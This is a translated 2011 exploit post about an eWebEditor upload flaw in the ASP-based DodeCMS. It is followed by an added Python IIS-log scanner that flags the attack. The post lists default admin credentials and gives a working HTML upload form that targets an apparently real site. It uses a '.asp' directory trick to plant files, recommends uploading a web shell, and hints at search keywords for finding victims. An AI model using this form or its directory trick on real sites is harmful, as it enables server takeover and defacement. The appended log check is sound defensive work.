DodeCMS to create a website content management system: upload vulnerability (0day) - vulnerability warning - the black bar safety net

2011-03-19T00:00:00
ID MYHACK58:62201129779
Type myhack58
Reporter Anonymous
Modified 2011-03-19T00:00:00

Description

Program description: DodeCMS is a website content management system developed by Liaoning to create a network Technology Co., Ltd. on Microsoft ASP with a general-purpose Access database. Pages are served in dynamic mode, and system customization is largely implemented. The code is concise and efficient, easy to modify and maintain, and highly extensible.

Default admin path: admin/

Default admin username and password: admin

Official website: <http://www.dodecms.com/>

Prerequisite: IIS 6.0 + ASP environment

Vulnerable file: admin/eWebEditor/asp/upload.asp. The code is omitted and the cause is omitted. (If you want to know, search Baidu yourself.)

Exploit code:

```html
<form action="http://www.0855.tv/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp" method="post" name="myform" enctype="multipart/form-data">
<input type="file" name="uploadfile" size="100"><br><br>
<input type="submit" value="upload">
</form>
```

The original post shows screenshots as proof (uploading a pony, a small web shell, is recommended).


Because the test install is on my local machine, which is not IIS 6.0, the uploaded file could not be parsed successfully.

Test: Powered by DodeCMS

Find more keywords yourself. The laws of the Celestial Empire do not allow this, so go easy.

Fix: add validation, change the path, or delete the file directly.
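
A log check for the condition this advisory depends on, added here as an example and not part of the original post: IIS 6.0 passes any file stored under a directory whose name ends in a script extension to the ASP engine, so the check flags upload.asp requests whose cusdir value names such a directory, and any request served from under one. The W3C field layout, the extension list, the sample log lines and the /uploadfile/ path are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Extensions IIS 6.0 hands to the ASP engine by default.
SCRIPT_EXT = (".asp", ".asa", ".cer", ".cdx")
UPLOAD_STEM = re.compile(r"/ewebeditor/asp/upload\.asp$", re.I)

# Constructed sample log (IIS W3C format); addresses and paths are made up.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2011-03-19 10:00:01 POST /admin/eWebEditor/asp/upload.asp action=save&type=image&style=popup&cusdir=x.asp 192.0.2.10 200
2011-03-19 10:00:05 GET /uploadfile/x.asp/20110319.jpg - 192.0.2.10 200
2011-03-19 10:01:00 POST /admin/eWebEditor/asp/upload.asp action=save&type=image&style=popup 192.0.2.20 200
2011-03-19 10:02:00 GET /index.asp - 192.0.2.30 200
""".splitlines()

def script_segment(path, dirs_only):
    """True if a path segment carries a script extension (optionally ignoring the file name)."""
    segs = [s for s in path.replace("\\", "/").split("/") if s]
    if dirs_only:
        segs = segs[:-1]
    return any(s.lower().rstrip(". ").endswith(SCRIPT_EXT) for s in segs)

def classify(stem, query):
    """Return a finding label for one request, or None if it looks benign."""
    if UPLOAD_STEM.search(stem):
        # ASP reads query keys case-insensitively, so compare in lower case.
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key.lower() == "cusdir" and script_segment(value, dirs_only=False):
                return "upload-into-script-named-dir"
    if script_segment(unquote(stem), dirs_only=True):
        return "request-under-script-named-dir"
    return None

def scan(lines):
    """Parse W3C log lines using the #Fields header and collect (client, label, stem) hits."""
    fields, hits = [], []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            label = classify(row.get("cs-uri-stem", ""), row.get("cs-uri-query", ""))
            if label:
                hits.append((row.get("c-ip"), label, row.get("cs-uri-stem")))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same `script_segment` test can serve as the "add validation" fix if it is applied to the directory parameter before the upload handler creates anything on disk.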